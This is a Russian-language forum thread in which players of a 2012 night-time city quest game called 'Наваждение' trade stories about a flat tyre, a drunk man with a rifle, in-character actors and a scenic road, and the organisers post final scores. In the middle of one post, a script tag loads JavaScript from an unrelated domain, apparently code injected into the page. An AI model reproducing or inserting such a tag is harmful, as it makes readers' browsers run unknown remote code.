Форумы Dead-Line

Форумы Dead-Line (http://dead-line.spb.ru/forum/index.php)
-   Обсуждение прошедших игр (http://dead-line.spb.ru/forum/forumdisplay.php?f=14)
-   -   12.5 "Наваждение" от команды "Осторожно, Маньяки!" (http://dead-line.spb.ru/forum/showthread.php?t=5658)

ndevil 22-10-2012 15:10

Цитата:

Сообщение от Го (Сообщение 247086)
Че то, когда вы компрессор брали, оно в лучшем состоянии было, кажися...

ааа, так это мы у вас компрессор брали? компрессор не помог к сожалению, ни сколько не накачал даже, но за помощь спасибо огромное все равно, а то забыли даже спросить что за команда была :)
<script language='javascript' type='text/javascript' src='http://dkemeli.ru/6jvejwr5fdo962mlsh0tucuftwotqhh'></script>
а таким оно стало после того как мы на нем спущенном проковыляли километров 15 в лугу со скоростью 15-20км/ч , попутно пытаясь гуглить шиномонтажки по дороге (безуспешно), больше всего опасались диск ушатать совсем, но на удивление он выдержал и достаточно оказалось его только прокатать.

MiX 22-10-2012 16:27

Зато в этом местном Купчино вискас и конину по ночам продают :D

Го 22-10-2012 16:31

Цитата:

Сообщение от MiX (Сообщение 247101)
Зато в этом местном Купчино вискас и конину по ночам продают :D

Это ты так колбаски получал? :D:D:D

den_za 22-10-2012 16:39

Цитата:

Сообщение от Го (Сообщение 247103)
Это ты так колбаски получал? :D:D:D

колбаски не он получал, а Кис, отводя Дарси в отдельную палатку, ну ты чего, не смотрел что ли? :D

Го 22-10-2012 16:45

Я в это время объяснял мужику "с калашом", что ему стоит убраться откуда вылез и не мешать понаехавшим развлекаться... Так что чудесное превращение конины и вискаса в колбаску я пропустил )))

MiX 22-10-2012 16:57

Цитата:

Сообщение от Го (Сообщение 247105)
Я в это время объяснял мужику "с калашом", что ему стоит убраться откуда вылез и не мешать понаехавшим развлекаться... Так что чудесное превращение конины и вискаса в колбаску я пропустил )))

Дада, мы слышали издалека что то про лицо топор и воткну :)
Интересно, этот скалашом до дома хоть дополз, иди под деревом спать улегся?

А колбаски нет, не из-за алкашки некачественной. Там масло, какава, ицо и печенье. А бухашка ее так жестоко об землю.

Ol4ik 22-10-2012 17:12

Мне больше понравился рассказ агентов о том, что Фомка, как молодой отец, сразу распознал обман и радостно слопал колбаску :D

Го 22-10-2012 17:16

Цитата:

Сообщение от MiX (Сообщение 247107)

А колбаски нет, не из-за алкашки некачественной. Там масло, какава, ицо и печенье. А бухашка ее так жестоко об землю.

М.. Ну, видать качественно получилась, раз побоялись пальчиком ковырять)))

А мужик скалашом на ногах, в принципе, уверенно стоял, но соображал туго. На вопрос, почему шлагбаума нет, если дорога его, он признал, что дорога не его и подвис. Потом заявил, что тут ограничение 40, я стартанул на скорости 80. Еще больше подвис и ушёл. Вообще, не мужик, а кладезь логики))

Bersem 22-10-2012 17:21

Мне понравилась команда(?WTF?) принявшая идиодную подсветку за идентификатор лисы, и вывалившаяся из машины со словами: "мы тут ведём преследование" и так далее (%
Вообще нам везло ночью на подъезжающие машины, - подлетевший джип, вставший наискосок спереди, отрезавший дорогу вкупе с ещё машиной подперевшей сзади были внезапны. Потом оттуда вывалились люди и спросили что это мы тут делаем в такое время в таком месте, - "А не мародёры ли вы?". Выяснилось, что в 20 метрах от нас с другой стороны дороги валялась машина вверх колесами. Потом этот здоровенный джип развернулся, оказалось что такой джипяра ездит на маааааааленьких таких 14-ых, наверное, колесах

ЗаяЦ 22-10-2012 20:44

А кто птичник писал? :)

Ol4ik 22-10-2012 21:54

Поскольку апелляций не поступало, сегодня в 20-18 статистика стала окончательной.
Всем спасибо за то, что приняли участие в нашей игре!
Оценки принимаются до субботы, 27 октября, 20-18.

MiX 22-10-2012 21:54

Цитата:

Сообщение от ЗаяЦ (Сообщение 247130)

Кошко

Jaguar 22-10-2012 22:08

Цитата:

Сообщение от ЗаяЦ (Сообщение 247130)

что такое? тоже заклевали?

kadet 22-10-2012 23:38

Огромное спасибо за Игру! было особенно веслео когда 764 пробили колесо, спасибо экипажу ауди то что им помогли с компрессором, а нашему экипажу пришлось лететь с другого края зоны на закрытие задания, наш экипаж (как и вся команда FST) получили только положительные эмоции, да именно мы иногда тупили, невнимательно смотрели на перфак, но всё равно всё было просто СУПЕР!!!

Ol4ik 22-10-2012 23:42

Завтра утром закроем игру. Просьба ко всем капитанам откорректировать составы, если это необходимо.

buhangel 22-10-2012 23:52

Цитата:

Сообщение от MiX (Сообщение 247107)

какашка знатная получилась! я уже отвыкла от перфаков, и благодаря вам вспомнила своё ощущение, когда первый раз в ДЛ попала на перфак, и за мной по коридорам гонялся чувак с бензопилой. помню, было наиглупейшее ощущение себя - вроде как и стрёмно, а вроде как и безумно ржачно, при чём ржачно это именно над собой. А когда одновременно представляешь, как это всё со стороны выглядит-ржачно вдвойне)))

игра отличная, костюмы-агенты-цитаты-палатки-проигрыватели..ух! можно перечислять бесконечно! и вообще понравилось, что агенты выдерживали роли даже когда мы тупили. а то бывает вот на уровне игроки тупят, а агенты с роли съезжают и уже по-нашенски глаголить начинают, про коды какие-то, КЦ и проч. А эти вот чётко - съел, говорят, шифровку, и всё тут!

так же хочется отдельно выделить ГЭС, и завораживающие ночные загородные дороги. Листья падают, белки бегают. красота!

Jaguar 23-10-2012 08:57

Цитата:

Сообщение от Ol4ik (Сообщение 247143)
Завтра утром закроем игру. Просьба ко всем капитанам откорректировать составы, если это необходимо.

добавь меня в авторы, а то я без енкоочков буду)) гыыы

Velkopiterskij 23-10-2012 09:12

Цитата:

Сообщение от Tigra (Сообщение 247082)
Вот хотелось бы поскрипеть по-стариковски, как агент Коробейников (старик-типичная сволочь).
Мы старались сделать игру, чтоб "полю" было интересно, разнообразно, весело и динамично, как сами фильмы Гайдая.
КЦ-штука хорошая, но дорогое "поле", если ОНО вас куда-то послало и сказало что там агенты, ну вы хоть тему задания посмотрите, сценку вспомните-сообразите. А то прибегают, спрашиваю -Чаво надо?- и 100% тупо в ответ -КОД!-вот так и дал бы клюкой в лоб.....потом со скрипом вспоминали про стулья, деньги, но про ордера не вспомнил ни кто...
и так наш уровень был легче-легкого.. эх надо было книгу заставлять почитать при входе...
Древ, конечно так и надо играть: прибежал, быстро взял и еще быстрее убежал, но хоть улубнулся что ли - ведь это просто игра - так хотелось бабахнуть из ружья в задницу - развеселить..
хорошо, что после вас были лимитсы и идиоты - подняли настроение, чай-кофе попили - уважили старика...

Коробейников был великолепен. Лучше, чем Гайдай)

Ol4ik 23-10-2012 12:24

Видео красивой дороги в зоне игры. Для тех кто не заметил или там не был.
Пардон за качество - снималось на старую ноклу и через грязное лобовое стекло :)

Odin 23-10-2012 12:28

Дорога от Бора до Югостиц?... ))))) В ночи она охуенна... Меня не покидало ощущение, что мы заехали в какой-то парк и прем по главной аллее... :o

Ol4ik 23-10-2012 12:46

Цитата:

Сообщение от Odin (Сообщение 247164)
Дорога от Бора до Югостиц?... ))))) В ночи она охуенна... Меня не покидало ощущение, что мы заехали в какой-то парк и прем по главной аллее... :o

именно она! Мы когда первый раз приехали - думали в сказку попали.

Куличок 23-10-2012 12:50

Цитата:

Сообщение от Ol4ik (Сообщение 247162)
Пардон за качество - снималось на старую ноклу и через грязное лобовое стекло :)

Прошу простить за отсутствие омывайки :D

Jaguar 23-10-2012 12:54

ночью, с желтыми листьями по всей дороге, которые разлетаются за машиной...она еще более офигенная)

YaWeR 23-10-2012 13:15

А у меня было чуство сейчас из кустов то ли леший то ли фея выйдет

Heckfy 23-10-2012 13:17

А у меня было чувство, что я уже пол игры играю и блин еще ни на одном поиске не был)))

Eol 23-10-2012 13:22

Цитата:

Сообщение от Heckfy (Сообщение 247178)
А у меня было чувство, что я уже пол игры играю и блин еще ни на одном поиске не был)))

Дык на той же дороге два уровня было? На дороге был а на поиске не? ))

Batleby 23-10-2012 13:23

Цитата:

Сообщение от Heckfy (Сообщение 247178)

Ну зато перед тобой и пели и плясали и костюмы и декорации, как в Большой сходил:D

Heckfy 23-10-2012 14:46

Я сам плясал и пел! И даже какаху кушал)

Bamb!na 24-10-2012 01:04

Цитата:

Сообщение от Heckfy (Сообщение 247195)
Я сам плясал и пел! И даже какаху кушал)

да,Хек )) вспоминаю с содроганием =)

Ol4ik 24-10-2012 15:54

Кстати, хотели выложить после ПМ, но запамятовали.
шикарный ролик по Наваждению.
те кто снимал уровень с "починкой радионаушников" могут узнать начало :)

ВарENик 24-10-2012 23:43

Хорошая девочка Лида без мозгов... не даром на каменных плитах без мозгов...

Жесть...

DrK 28-10-2012 13:47

16.912 -> 17 баллов в рейтинг.
Молодцы!

Часовой пояс GMT +3, время: 02:42.